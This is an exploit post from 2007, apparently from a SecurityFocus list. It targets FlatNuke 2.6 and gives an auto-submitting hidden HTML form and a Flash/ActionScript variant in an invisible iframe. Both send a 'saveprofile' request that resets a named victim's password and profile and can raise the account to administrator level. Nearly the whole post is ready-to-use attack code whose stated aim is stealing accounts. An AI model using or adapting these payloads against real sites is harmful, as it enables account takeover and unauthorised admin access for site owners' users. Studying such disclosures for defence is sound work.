Arbitrary Command Inclusion Sep 24 2007 06:12PM
darkbunny91 gmail com
/* hackflatnuke.txt
*
* Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified)
*
* With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin
*
* Requirements: - You have to know the nickname of the account u want to steal or change
*
*/

HTML version modifiable


<!-- flatnuke.html-->
<html>
<body>
<title>Hack FlatNuke</title>
<form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login">
<input type="hidden" name="action" value="saveprofile">
<input type="hidden" name="user" value="VICTIM">
<input type="hidden" name="regpass" value="NEW_PASS">
<input type="hidden" name="anag" value="NAME">
<input type="hidden" name="homep" value="VICTIM_SITE">
<input type="hidden" name="prof" value="PROFESSION">
<input type="hidden" name="prov" value="ORIGIN">
<input type="hidden" name="ava" value="blank.png">
<input type="hidden" name="url_avatar" value="">
<input type="hidden" name="firma" value="VICTIM">
<input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator">
</form>
<script> document.body.onload = document.forms[0].submit(); </script>
</body>
</html>
<!-- Byez -->

Flash versione that you have to export in a swf and import in a iframe

exploit.swf

var action:String = "saveprofile";
var user:String = "nome_user_che_modifichiamo";
var regpass:String = "nuova_pass";
var anag:String = "nome";
var homep:String = "sito_utente";
var prof:String = "professione";
var prov:String = "provenienza";
var ava:String = "blank.png";
var url_avatar:String = "";
var firma:String = "firma_utente";
var level:String = "livello da 1 a 10 N.B 10=amministartore";
getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST");

hackflatnuke.html

<html>
<head>
<title>Title</title>
</head>
<body bgcolor="000000">
<center>
<font face="Verdana" size="5" color="#FF0000">
Hack FlatNuke
</font>
<br/>
<br/>
<iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe>
</center>
</body>
</html>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus